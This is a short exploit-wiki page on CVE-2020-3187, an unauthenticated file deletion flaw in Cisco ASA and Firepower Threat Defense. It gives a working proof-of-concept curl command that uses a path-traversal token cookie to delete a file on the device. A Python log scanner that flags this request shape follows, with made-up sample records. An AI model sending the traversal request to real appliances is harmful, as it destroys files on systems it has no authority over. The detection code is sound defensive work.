Cisco unauthenticated arbitrary file deletion vulnerability CVE-2020-3187
From PwnWiki
Affected systems:
Cisco Adaptive Security Appliance
Cisco Firepower Threat Defense Software
POC:
Example: deleting the logo file:
payload:
/+CSCOU+/csco_logo.gif
Run:
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
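
For detection, the request shape above (the session_password.html endpoint plus a token cookie carrying a parent-directory segment) can be matched in proxy or WAF logs. The following is an added example, not part of the original page; the tab-separated log layout, the function names and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Endpoint named in the PoC on this page.
TARGET_PATH = "/+CSCOE+/session_password.html"
# Value of the "token" cookie inside a Cookie header.
TOKEN_RE = re.compile(r"(?:^|;\s*)token=([^;]*)", re.IGNORECASE)
# A ".." path segment delimited by slashes, backslashes or string ends.
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so single and double encoding normalise."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_token(path, cookie_header):
    """Return the decoded token if the request matches the shape, else None."""
    if decode_fully(path.split("?", 1)[0]).lower() != TARGET_PATH.lower():
        return None
    match = TOKEN_RE.search(cookie_header or "")
    if not match:
        return None
    token = decode_fully(match.group(1))
    return token if TRAVERSAL_RE.search(token) else None

def scan(lines):
    """Assumed layout per line: client_ip, method, path, Cookie header (tab-separated)."""
    hits = []
    for line in lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 4:
            continue  # skip records that do not fit the assumed layout
        ip, _method, path, cookie = parts
        token = traversal_token(path, cookie)
        if token is not None:
            hits.append((ip, token))
    return hits

# Constructed sample records (documentation IP ranges), not real traffic.
SAMPLE = [
    "198.51.100.7\tGET\t/+CSCOE+/session_password.html\ttoken=../+CSCOU+/csco_logo.gif",
    "198.51.100.9\tGET\t/+CSCOE+/session_password.html\tlang=en; token=%2e%2e%2f+CSCOU+%2fcsco_logo.gif",
    "203.0.113.5\tGET\t/+CSCOE+/session_password.html\ttoken=4F2A9C@12345",
    "203.0.113.8\tGET\t/+CSCOE+/logon.html\ttoken=../x",
]

if __name__ == "__main__":
    for ip, token in scan(SAMPLE):
        print(f"ALERT CVE-2020-3187 request shape from {ip}: token={token}")
```

The check only works where the log source records the Cookie header, which many default access-log formats do not.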